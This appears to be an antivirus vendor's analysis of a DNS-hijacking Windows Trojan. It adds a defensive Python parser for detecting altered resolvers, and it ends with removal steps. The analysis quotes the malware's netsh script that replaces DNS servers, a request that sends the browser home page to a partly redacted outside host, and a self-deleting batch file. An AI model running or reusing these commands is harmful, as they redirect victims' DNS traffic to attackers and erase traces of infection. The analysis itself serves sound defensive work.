Detected: Aug 09 2010 12:19 GMT
Released: Aug 09 2010 20:58 GMT
Published: Oct 26 2010 10:21 GMT
This Trojan has a malicious payload. It is a Windows application (PE EXE file), 585 661 bytes in size, written in Delphi.

(The original description includes a screenshot of the program's main window.)
Once launched, the Trojan performs the following actions:

It checks whether the following processes (VMware guest tools) are running:
  VMwareUser.exe
  VMwareService.exe
  VMwareTray.exe

It locates the following file:
  %Documents and Settings%\All Users\Templates\Directdb.xml
For Windows Vista and Windows 7:
  %Temporary Internet Files%\Directdb.xml
It renames these files, respectively, to:
  %Documents and Settings%\All Users\Templates\qweoi.tmp
  %Temporary Internet Files%\qweoi.tmp
It then schedules a deferred deletion of these files (where the deleted files come from, and whether they belong to some legitimate application, has not been established).
The Trojan also launches two copies of its body and injects into each a block of code taken from its resources.

The code injected into the first copy is 99 328 bytes in size and is detected by Kaspersky Anti-Virus as Trojan-Downloader.Win32.Agent.eisi. The injected code performs the following actions:
It creates the file:
  <X>:\tmp.log
where <X> indicates the system disk. It runs the command:
  ipconfig.exe /all >C:\tmp.log
which saves the Windows IP configuration to the file "C:\tmp.log". From this output it takes the name of the network connection and writes the following netsh script to the same file:
  pushd interface ip
  set dns name="<Name>" source=static addr=121.***.240 register=PRIMARY
  add dns name="<Name>" addr=125.***.219 index=2
  set wins name="<Name>" source=static addr=none
  popd
where <Name> is the name of the network connection, for example "Local Area Connection". It then runs the command:
  netsh.exe -f C:\tmp.log
This replaces the primary and secondary DNS servers of the connection with the addresses above and, as a consequence, redirects all DNS requests from the system to those addresses.

The connection name is extracted by searching the "ipconfig /all" output for the literal string "Ethernet adapter", so the method only works on systems where this string has not been localized, i.e. translated into a national language. On a Russian-localized Windows, for example, "ipconfig /all" displays "Ethernet адаптер" instead, the search finds nothing and the DNS settings are not changed.
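As an added example (not part of the original description or of the Trojan's code), the following Python script shows both sides of the DNS hijack described above: how a match on the literal "Ethernet adapter" header of "ipconfig /all" output recovers the connection name on an English Windows but finds nothing on a Russian-localized one, and how the DNS servers set by a script in the "netsh -f" format used here can be extracted and compared against a list of trusted resolvers. The two ipconfig outputs, the netsh script, the DNS addresses (taken from the TEST-NET documentation ranges, not the Trojan's redacted ones) and the trusted-resolver list are all constructed for this example.

```python
import ipaddress
import re
import shlex

# Constructed sample: `ipconfig /all` output on an English Windows XP system.
IPCONFIG_EN = """\
Windows IP Configuration

        Host Name . . . . . . . . . . . . : victim-pc
        Node Type . . . . . . . . . . . . : Hybrid

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : example.lan
        IP Address. . . . . . . . . . . . : 192.168.1.50
        DNS Servers . . . . . . . . . . . : 192.168.1.1
"""

# Constructed sample: the same system with Russian localization. The adapter
# header is translated, which is the case the description says defeats the match.
IPCONFIG_RU = """\
Настройка протокола IP для Windows

Ethernet адаптер Подключение по локальной сети:

        IP-адрес  . . . . . . . . . . . . : 192.168.1.50
        DNS-серверы . . . . . . . . . . . : 192.168.1.1
"""

# Constructed netsh script in the shape the Trojan writes to tmp.log. The two
# addresses are from the TEST-NET documentation ranges, not the real ones.
NETSH_SCRIPT = """\
pushd interface ip
set dns name="Local Area Connection" source=static addr=198.51.100.10 register=PRIMARY
add dns name="Local Area Connection" addr=203.0.113.20 index=2
set wins name="Local Area Connection" source=static addr=none
popd
"""

ADAPTER_HEADER = re.compile(r"^Ethernet adapter (.+):\s*$")


def adapter_names_like_trojan(ipconfig_output):
    """Recover connection names by matching the untranslated English header
    line, as the description says the Trojan does. Returns [] on localized
    output, which is why the hijack fails on e.g. Russian Windows."""
    names = []
    for line in ipconfig_output.splitlines():
        m = ADAPTER_HEADER.match(line)
        if m:
            names.append(m.group(1))
    return names


def dns_servers_from_netsh_script(script):
    """Map interface name -> ordered DNS servers configured by a netsh -f script.
    'set dns ... addr=' replaces the list (primary); 'add dns ... addr=' appends.
    shlex handles the quoted interface name, which contains spaces."""
    servers = {}
    for line in script.splitlines():
        try:
            tokens = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: not a well-formed netsh line
        if len(tokens) < 3 or tokens[0] not in ("set", "add") or tokens[1] != "dns":
            continue
        kv = dict(t.split("=", 1) for t in tokens[2:] if "=" in t)
        name, addr = kv.get("name"), kv.get("addr")
        if not name or not addr or addr.lower() == "none":
            continue
        if tokens[0] == "set":
            servers[name] = [addr]
        else:
            servers.setdefault(name, []).append(addr)
    return servers


def flag_unexpected_dns(servers, trusted):
    """Return {interface: [addresses]} for every configured DNS server that is
    not in the trusted list. Unparseable addresses are reported as well."""
    trusted_ips = {ipaddress.ip_address(t) for t in trusted}
    findings = {}
    for name, addrs in servers.items():
        bad = []
        for a in addrs:
            try:
                if ipaddress.ip_address(a) not in trusted_ips:
                    bad.append(a)
            except ValueError:
                bad.append(a)
        if bad:
            findings[name] = bad
    return findings


if __name__ == "__main__":
    print("EN adapters:", adapter_names_like_trojan(IPCONFIG_EN))
    print("RU adapters:", adapter_names_like_trojan(IPCONFIG_RU))
    configured = dns_servers_from_netsh_script(NETSH_SCRIPT)
    print("DNS set by script:", configured)
    print("Unexpected:", flag_unexpected_dns(configured, ["192.168.1.1"]))
```

During incident response the same parser can be pointed at a recovered tmp.log, or at the output of "netsh interface ip dump", to list exactly which resolvers were configured on each connection before the settings are restored.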
It sends a request to:
  http://www.qq***nead.com/GetServer.asp?Mac=<StartPage>&otherInfo=ok
where <StartPage> is the Internet Explorer home page, read from the "Start Page" value of the following registry key (despite the parameter name, the value sent is the home page, not a MAC address):
  [HKCU\Software\Microsoft\Internet Explorer\Main]

It copies its body to the directory:
  C:\RECYCLER\
under the name:
  Temp.dat
and schedules a deferred deletion of this file.

The code injected into the second copy is 479 232 bytes in size. This code performs the following actions:
It sends a request to:
  http://yuanfa***43759.com/xg/updateinfo.htm
At the time of writing, this resource was not accessible.

The response is checked for a successful status (HTTP code 200) and for the string:
  Start
The received data is then processed. Presumably it contains a list, possibly of URLs: the code that handles the response searches extensively for delimiters. The processing itself has not been investigated, since the resource is no longer available and the handling logic is driven entirely by the data it receives.

It creates a batch file with the following content and runs it:
  :try
  del /q /f "<Path_to_original_body_of_trojan>"
  if exist <Path_to_original_body_of_trojan> goto try
  del %0
Running this file deletes the body of the Trojan and then the batch file itself.
If your computer does not have antivirus protection and has been infected by this malicious program, follow the instructions below to delete it:

Delete the following files:
  %Temp%\<rnd>
  <X>:\tmp.log
where <X> indicates the system disk.

Because the Trojan replaces the DNS servers of the network connection, also check the connection's DNS settings and restore them (for example, to obtaining DNS server addresses automatically) if they point to unknown addresses.
This type of behaviour covers malicious programs that delete, block, modify or copy data, or disrupt computer or network performance, but which cannot be classified under any of the behaviours identified above.
This classification also covers "multipurpose" Trojan programs, i.e. those capable of performing several actions at once and exhibiting several Trojan behaviours in a single program, so that no single behaviour can be indisputably assigned to them.